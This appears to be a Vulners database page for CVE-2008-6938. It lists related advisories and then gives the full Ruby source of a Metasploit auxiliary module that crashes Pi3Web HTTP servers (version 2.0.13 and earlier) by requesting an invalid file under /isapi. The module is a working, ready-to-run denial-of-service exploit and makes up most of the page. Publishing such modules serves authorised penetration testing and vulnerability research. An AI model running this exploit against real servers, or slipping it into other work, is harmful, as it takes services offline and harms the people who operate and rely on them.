| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| CVE-2008-6938 | 13 Nov 200800:00 | – | circl | |
| CVE-2008-6938 | 11 Aug 200920:25 | – | cve | |
| CVE-2008-6938 | 11 Aug 200920:25 | – | cvelist | |
| CVE-2008-6938 | 11 Aug 200921:00 | – | nvd | |
| Pi3Web ISAPI Requests Handling DoS Vulnerability | 2 Dec 200800:00 | – | openvas | |
| Pi3Web ISAPI Denial of Service | 31 Aug 202400:00 | – | packetstorm | |
| Server side request forgery (ssrf) | 11 Aug 200921:00 | – | prion |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Pi3Web ISAPI DoS',
'Description' => %q{
The Pi3Web HTTP server crashes when a request is made for an invalid DLL
file in /isapi for versions 2.0.13 and earlier. By default, the non-DLLs
in this directory after installation are users.txt, install.daf and
readme.daf.
},
'Author' => 'kris katterjohn',
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2008-6938'],
[ 'OSVDB', '49998'],
[ 'EDB', '7109' ]
],
'DisclosureDate' => '2008-11-13'))
register_options([
OptString.new('FILENAME', [ true, 'File in /isapi to request', 'users.txt' ])
])
end
def run
begin
o = { 'uri' => "/isapi/#{datastore['FILENAME']}" }
c = connect(o)
c.send_request(c.request_raw(o))
print_status("Request sent to #{rhost}:#{rport}")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_status("Couldn't connect to #{rhost}:#{rport}")
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation